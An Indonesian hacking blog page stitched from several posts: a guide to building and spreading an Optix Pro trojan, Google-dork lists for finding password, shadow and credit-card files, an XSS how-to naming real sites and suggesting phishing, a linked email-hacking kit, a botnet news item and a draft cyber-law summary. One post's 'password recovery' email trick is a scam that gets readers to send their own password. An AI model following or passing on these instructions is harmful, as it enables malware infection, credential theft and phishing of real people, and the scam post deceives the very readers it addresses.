jam

Selasa, 09 Maret 2010

cara mudah buat trojan

Pasti pada bingung nih, “Buat Trojan, Klik truzz Cick lage” apaan tuh? Haha... Kita akan membuat Trojan hanya dengan meng klik dan hanya mengetik sedikit:iconbiggrin: . Jadi proses pembuatan Trojan ini pun sangat mudah tidak seperti di bayangan anda yang memperlukan bahasa programming yang sangat advance. Kita akan menggunakan Trojan Builder yang bernama Optix Pro dan tentunya saya janji kepada anda pasti dapat membuat Trojan ini tidak lebih dari 2 menit! Kalau lebih dari 2 menit nanti saya traktir Mie Goreng di depan rumah saya!! :happy2:

Trojan itu apaan sich!?!!

Trojan horse atau Trojan, dalam keamanan komputer adalah sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) dan dapat merusak sebuah sistem atau jaringan. Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:

• Trojan bersifat "stealth" (Kalau buat saya, saya lebih suka bilang bahwa Trojan adalah siluman yang tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.
• Trojan tidak mereplikasi dirinya sendiri, sementara virus komputer dan worm melakukannya.

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik dan berguna, seperti halnya dalam Perang Trojan, para prajurit Yunani bersembunyi di dalam Trojan Horse yang ditujukan sebagai pengabdian kepada Poseidon. Trojan Horse tersebut menurut Poseidon dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun. Pada suatu malam ketika Prajurit Troya ini lagi hepi-hepi karena mendapatkan penghargaan, tiba-tiba semua prajurit Yunani yang bersembunyi di dalam Trojan Horse itu keluar dan siap menyerbu benteng Troya. Akhirnya habislah kota Troya diserbu oleh prajurit Yunani.

Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang hacker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

Mulai buat yuk...

A) Persiapan

Gak boleh pinter bahasa programming.
Kalau gak percaya buat Trojan ini kurang dari 2 menit silahkan hitung pakai Stopwatch.
Harus bisa gunaiin mouse.
Program Trojan Builder (Optix Pro) – Download


B) Pembuataan Server Trojan

1) Extract Program Trojan Buider.
2) Klik folder Optix Pro Trojan > Builder > Buider.exe
3) Klik Main Settings
4) Centang Bagian Passsword dan ketikan password yang anda inginkan. Jika anda tidak memasukan password, kemungkinan komputer yang telah terinfeksi Trojan anda dapat dikontrol oleh orang lain.
5) Centang bagian Fake error.
6) Klik server icon, kemudian pilih icon anda untuk Trojan yang akan dibuat. Bagian ini sangatlah berguna untuk mengelabuhi korban Trojan anda.
7) Klik Notidications, klik lagi account website yang anda gunakan. Untuk tutorial ini saya akan mengunakan MSN Notifications.
8 Klik Build/Create Server. Windows “ Save As” akan Nongol. Ketik Nama yang anda inginkan untuk nama Trojan anda. Saya akan menamakan Trojan saya “Emang Gw Pikirin” karena icon yang saya pakai adalah Media Player.
9) Selamat anda telah mempunyai Trojan!! Kurang dari 2 menit atau bahkan kurang dari 1 menit!!!

C) Mengunakan Client Trojan

1) Klik folder Optix Pro Trojan > Client > Client.exe
2) Ketik IP korban, Port(3410), dan Password yang anda buat ketika proses pembuatan Trojan.
3) Menggunakan Client ini pun sangatlah mudah, tinggal klik truzzz click en klik trus klik en click lage....

D) Sebarin Trojan Kamu

1) Gunaiin kreatiftas kamu. Untuk kali ini saya akan menggunakan e-mail.
2) Sign in ke Yahoo Mail anda. Compose Message dan attach Trojan anda. Dibawah ini adalah Pesan saya.

cari pasword lwat mbah google

MENCARI PASSWORD LEWAT GOOGLE
Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi.

Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com

Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :

Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.

"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.

“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.



Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.



>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.


“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.

Sebagai contoh:

“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org


“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :



“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.



“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.



“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.



“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.



Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.


ex :

Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery

Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*

Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)

Operator dasar

+, -, ~ , ., *, “”, |, OR

Operator tambahan

allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Pencarian berdasarkan range
komputer Rp5000000..7000000

Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu

Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls

Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”

Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”

Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”

Mencari License Key
Filetype: lic lic intext: key

Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples

hack email pasword

Lupa password email anda? Sementara, untuk dapatkan password baru anda juga lupa data tanggal lahir – kode pos dan sebagainya! Nah, mungkin perlu sedikit ilmu ngeHACK. Aku pernah lihat di sebuah blog trik ini.
Tapi jangan digunakan buat yang jahat-jahat. Karena apa yang anda perbuat ada karmanya. Dosa anda tanggung sendiri
Nah, ini langkahnya:
1. Masuk ke Akun Yahoo anda [harus akun yang sudah 30 hari]
2. Buat sebuah email ke : pass_back_cgi@yahoo.com – Nanti sebuah email balasan otomatis dari AUTOMATIC SERVER akan masuk ke email anda untuk memberikan PASSWORD baru
3. Pada subjek (isikan) : “password recovery”
4. Jangan isi bc dan bcc
5. contoh_emailku_lupa@yahoo.com [email yang anda lupakan passwordnya] – pada baris pertama
6. email_ku_inget@yahoo.com [email anda sendiri] – pada baris ke dua
7. passwordku [AUTOMATIC SERVER membutuhkan untuk mengirim balasan] – pada baris ke tiga
8. cgi-bin_RETRIEVE_PASS_BIN_PUB/$et76431&pwrsa – pada baris ke empat
9. script< ip://192.169.1.86/cgi-bin/start? – pada baris ke lima
10. v703&login=passmachine&f=(password)&f=27686 – pada baris ke enam
11. &javascript=ACTIVE&rsa#> – pada baris ke tujuh
langsung salin ajah
contoh_emailku_lupa@yahoo.com
email_ku_inget@yahoo.com
passwordkuinget
cgi-bin_RETRIEVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://192.166.1.86/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586
&javascript=ACTIVE&rsa#>

hack email

sesuai permintaan para setia PedasManisCinta untuk, bagaimana caranya menghack email yahoo, atau gmail ??
sebelum membaca saya ingin memberitahu anda,
bahwa menghack email itu bukan suatu ilmu seorang hacker. tapi ilmu ini biasa digunakan para cracker.
jadi ingat! kalau hacker itu masih punya kode etik jadi tidak diperkenankan untuk mengahancur, merusak, dan selalu bersifat merugikan.
oleh karena itu saya mohon maaf kepada para hacker.
ilmu ini jangan disebut-sebut bahwa hacker yang melakukan, tapi sebutlah bahwa cracker yang melakukan!
mengcracking email adalah cracking tingkat tinggi setelah bagaimana cara pembobolan bank, jadi ilmu ini sangat-sangat dirahasiakan.
oke, setelah puas membaca pemberitahuan dari PedasManisCinta.
langsung saja kita terjun ke lapangan.
mungkin sulit untuk diterangkan melalui blog ini.
jadi saya perkenankan mendownload dahulu tutorialnya dengan beberapa script kecil.
silahkan download disini atau http://www.ziddu.com/download/4965378/HackEmail.rar.html
sudah mendownload ??

> lihat turorialnya dahulu [dalam video].

> lalu ubah file .htm yang terlampir satu file disana [bernama : yahoo] buka dengan notepad. cara merubahnya dengan notepad : klik kanan file yahoo, open with, lalu klik notepad.

> setelah terbuka notepad tulisan "ISI NAMA SESUAI KEINGINAN ANDA" itu rubah dengan nama terserah bisa dirubah dengan nama terserah anda.

> lalu coba lihat lagi video tutorialnya.
oke ?? sudah selesai sampai disini.

bila masih kurang jelas bisa beri komentar, insya allah pasti akan saya tanggapi.
ingat ini bukan perbuatan hacker tapi ini perbuatan cracker.

diharap setelah berhasil mencoba,
dilarang tertawa dan bersenang-senang.^_^

cara hack situs dengan xss

Cara Paling Mudah Belajar Hack Suatu Situs Dengan XSS
Hacking December 11th, 2008
Mungkin cara hack web dengan memanfaatkan XSS sudah banyak dibicarakan tetapi masih banyak para web master yang meremehkan hal ini karena dianggap XSS tidak membahayakan..!!! Untuk dapat melakukan aktifitas hacking seperti ini tidak perlu mempunyai keahlian atau keterampilan khusus tetapi hanya mengerti dasar dari HTML saja sudah cukup..!!! Tetapi apa itu XSS..??? XSS adalah Salah satu jenis serangan web yang dilakukan dengan memanfaatkan kelemahan pada suatu aplikasi web sehingga memungkinkan `bad guys` untuk menginjeksikan suatu tag HTML ataupun Client Side Script pada aplikasi web tersebut dikarenakan adanya variabel yang tidak disanitasi dengan baik. XSS sendiri merupakan singkatan dari Cross Site Scripting. Lalu bagaimana cara mengetahui bahwa suatu situs memiliki kelemahan pada XSS..???
Untuk mengetahui apakah suatu web mempunyai kelemahan pada XSS sangatlah mudah..!!! Pada suatu web biasanya terdapat fasilitas untuk search. Nah biasanya kita mengetikan keyword biasa saja contoh “hack” tanpa tanda kutip maka akan muncul kata-kata berikut “No Result For Hack” atau kata-kata lain..!!! Lho jadi apa bedanya..???
Hmm… Mungkin dengan contoh atau langsung mencobanya menjadi lebih mudah..!!! Ok saya coba dengan sebuah situs berikut http://www.21cineplex.com/
1. Langkah Pertama yaitu perhatikan menu search pada situs tersebut. Lalu ketikan dengan keyword “hack” tanpa tanda kutip. lalu tekan enter.!!! Maka tampilan akan seperti ini..!!!
Maka akan muncul keterangan bahwa kata hack tidak ditemukan..!!!
2. Sekarang coba Kamu ketikan keyword seperti ini Copy dan pastekan kode tersebut pada menu search lalu enter..!! Hmm… kata hack tadi jadi lebih besar dan berkedip bukan..!!!
Karena Script HTML yang tadi kita tulis dapat berjalan maka hal ini lah yang disebut dengan XSS..!!! Lalu apa hanya kode HTML saja yang dapat di jalankan..??? Hm… Mungkin itu tergantung dari web itu sendiri seberapa besar kelemahannya..!!! Oh ya.. Kembali pada pekerjaan kita tadi, Jadi pada situs tersebut kita dapat sesuka hati untuk merubah tampilan dari situs tersebut atau mungkin untuk pencurian password admin.. WOW..!!!! Coba kamu lihat hasilnya saat ini melalui link berikut www.21cineplex.com
Berikut sedikit situs-situs yang memiliki kelemahan pada XSS :
www.Indonetwork.co.id
www.slankchord.com
www.kerjakarir.info
www.download-provider.com/en
www.jurnalnet.com
www.banknisp.com
www.chordfrenzy.com
www.teknikbisnis.com
Dan Masih banyak lagi situs-situs yang memiliki XSS. Bahkan sampai saat ini masih banyak situs - situs bank indonesia yang juga mempunyai kelemahan yang sama. Coba anda bayangkan dengan XSS kita dapat merubah sedimikan rupa sehingga situs hasil desain kita menjadi mirip dengan situs aslinya..!!! Sebarkan link hasil perbuatan kita maka bukan hal yang tidak mungkin ada orang yang tertipu sehingga memasukan data rahasianya kepada kita..!!! Dan saya harap ini menjadi sebuah pelajaran yang sangat berharga untuk anda khususnya bagi para webmaster dan untuk para pelaku bisnis online untuk berhati-hati..!!!

Jumat, 05 Maret 2010

Virus Kneber BotNet

Virus terbaru Kneber Botnet (virus jenis botnet) sudah menembus 75.000 jumlah korban, dan menginfeksi lebih dari 2.500 perusahaan sampai situs jejaring di internet.

VIrus botnet bukan virus biasa, tetapi sejenis pasukan virus yang dapat menyerang bersama-sama untuk tujuan tertentu.

Ditemukan pada bulan Januari, virus ini sudah menyebar ke beberapa perusahan komersil dan juga menembus sistem sekuriti pemerintah Amerika. Botnet ini telah mendapatkan lebih dari 68.000 user login dan password perusahaan, online banking, sistem email, account Yahoo, Hotmail dan situs jejaring sosial seperti Facebook.

Netwitness bahkan kesulitan mendeteksi ukuran dari Botnet tersebut, karena botnet tersebut memiliki ribuan ID dan menyerang di 200 negara.

Virus ini menargetkan serangan paling besar di OS Windows XP Pro SP2. Dan target terbesar kedua adalah Vista Home edition SP2 yang memiliki lubang pada sistem keamanan OS.

-------------------------------

'Kneber' Botnet Attacks PCs Worldwide: FAQ

Security firm Netwitness has discovered a new botnet that puts the potential threat of last year's Conficker worm to shame. Called the Kneber botnet, this new form of malware has infected more than 74,000 computer systems across the world and is focused on stealing login credentials for e-mail systems, social networks, and banking sites, according to Netwitness. Kneber is incredibly hard to detect and has reportedly compromised data from nearly 2500 corporate and government and corporate networks around the world. Here's the latest on what's going on and how you can protect yourself from joining the ranks of the Kneber botnet.

What is It?


Netwitness says Kneber is a ZeuS Trojan botnet, a type of botnet known for its capability to target and steal key information stored on your computer, such as login credentials. More than half of the computer systems in the Kneber botnet also have the Waledac Trojan--a worm known to create e-mail spam botnets that was recently associated with Conficker.

Where is Kneber?


Netwitness says Kneber controlled machines are in 196 countries. The five countries with the most significant instances of infected machines are Egypt, Mexico, Saudi Arabia, Turkey, and the United States.

Who is Getting Hit?


Kneber targets only Windows machines, and computers are running Windows XP Professional SP2 make up the majority of the botnet army. Netwitness did not report on infections among Windows 7 machines. Kneber is primarily found on machines in corporate and government infrastructures, but home users can be affected as well.

Netwitness hasn't named which companies have been compromised, but The Wall Street Journal is reporting that affected companies include Merck & Co., Cardinal Health, Paramount Pictures, and software company Juniper Networks Inc.

What is Being Stolen?


Kneber is targeting login credentials for online social networks, e-mail accounts, and online financial services. The top sites with stolen login credentials, according to Netwitness' report are Facebook, Yahoo, hi5, metroflog, sonico and netlog. While the focus has been on e-mail and social networks, Kneber is now targeting banking sites as well.

How Effective is it?


Netwitness reports that Kneber was able to grab 68,000 login credentials over a 4-week period.

How Old is Kneber?


The botnet has been around for nearly a year, according to Netwitness' report, but The Wall Street Journal is reporting the botnet campaign has been active for the past 18 months.

What Can I Do To Protect Myself?


Even though the Kneber botnet targets large organizations for infection, your machine at home can still be compromised. This botnet grows its numbers by convincing users to visit a malicious Website where malware sneaks onto your system or by downloading an e-mail attachment.

As with any form of malware, the best way to protect yourself is to use smart practices when navigating the Web. Don't download suspicious e-mail attachments, especially from addresses you don't recognize, and be wary of links to suspicious Websites. Some examples of suspicious links found in e-mail messages include requests for you to log in to your bank account to confirm something or invite you to view a funny video. Finally, always make sure your antivirus program is up to date. (PCWorld)

sumber: ketok.com

ruu tipiti

kreativiras terancam,ada undang2 cyber yang mengikat agar para penjelajah dunia maya tidak seenaknya
Pasal 9
Kejahatan terhadap nyawa dan keselamatan negara
Barangsiapa dengan sengaja dan melawan hukum memanfaatkan Teknologi Informasi dengan maksud untuk menghilangkan nyawa, harta benda orang lain, atau mengakibatkan kerusakan atau kehancuran obyek-obyek vital dan strategis atau lingkungan hidup atau fasilitas umum atau fasilitas internasional, usaha menggulingkan pemerintahan yang sah, atau membahayakan keamanan negara atau untuk memisahkan sebagian dari wilayah negara atau sebagai bagian dari kegiatan teror kepada orang atau negara lain, dipidana dengan pidana mati atau penjara seumur hidup atau pidana penjara, paling singkat 10 (sepuluh) tahun dan paling lama 20 (dua puluh) tahun



Pasal 11

Mengakses Tanpa Hak

Barangsiapa dengan sengaja dan melawan hukum memasuki lingkungan dan atau sarana fisik Sistem Informasi tanpa hak atau secara tidak sah menggunakan sandi akses palsu, melakukan pembongkaran tanpa seijin pemiliknya yang sah atau perusakan dengan atau tanpa maksud merugikan pemilik sah, dipidana penjara paling singkat 2 (dua) tahun dan paling lama 4 (empat) tahun atau denda sedikit – dikitnya Rp. 200.000.000,- (dua ratus juta rupiah) dan sebanyak-banyaknya Rp 800.000.000,- (delapan ratus juta rupiah).



PASAL 12
MENGAKSES TANPA HAK TERHADAP SISTEM INFORMASI STRATEGIS
Barangsiapa dengan sengaja dan melawan hukum memasuki lingkungan dan atau sarana fisikSistem Informasi milik instansi pemerintah, militer, perbankan, atau instansi strategis lainnya tanpa hak atau secara tidak sah dengan menggunakan sandi akses palsu, melakukan pembongkaran atau perusakan dengan atau tanpa maksud merugikan instansi yang dituju, dipidana penjara paling singkat 7 (tujuh) tahun dan paling lama 12 (dua belas) tahun atau denda sedikit – dikitnya Rp. 700.000.000,- (tujuh ratus juta rupiah) dan sebanyak-banyaknya Rp. 1.500.000.000,- (satu milyar lima ratur juta rupiah).
Apabila pelaku kejahatan dimaksud ayat (1) terbukti telah menyebarkan dan atau mengumumkan informasi yang harus dilindungi kepada pihak yang tidak berwenang, dipidana penjara sesuai Ayat (1), ditambah 2 (dua) tahun.


Penyalahgunaan email (pasal 27 ayat 1) atau memalsukan email orang lain (pasal 27 ayat 2), masing-masing dikenakan penjara tiga tahun atau lima tahun . Pemalsuan nomor IP (pasal 24) dan penggunakan nama domain secara tidak sah (pasal 26), masing-masing berakibat penjara maksimum 5 tahun.


Kasus penyebaran pornografi melalui TI akan diancam pidana maksimal penjara 7 tahun. Jika pornografi tersebut masuk kategori pornografi anak maka hukuman penjara menjadi lebih lama, sampai 15 tahun. Meski hanya membantu (pasal 17), pelaku tindak kejahatan akan diancam hukuman lima tahun penjara. Sedangkan kasus penyadapan secara ilegal, termasuk komunikasi data, akan mengalami hukuman penjara yang sama dengan pelaku hacking (pasal 22 ayat 1), yaitu selama lima tahun. Aksi hacking ini akan mendapatkan penjara lebih lama, selam 7 tahun, jika yang menjadi korban adalah situs milik pemerintah atau institusi (pasal 22 ayat 2).

Yang perlu diperhatikan dalam RUU tersebut adalah adanya ancaman penjara untuk pelanggaran hak cipta dengan TI, dan penyalahgunaan TI untuk menebar teror. Masing-masing kasus masuk dalam pasal 28 dan 20, dengan hukuman penjara 10 tahun untuk penyalahgunaan HAKI, dan 30 tahun untuk menebar teror melalui internet.



Selengkapnya, Draft UU TIPITI bisa di download di : http://www.ziddu.com/download/7911523/RUU-TIPITI.doc.html
 
Copyright © 2010 crazyboy | Design : Noyod.Com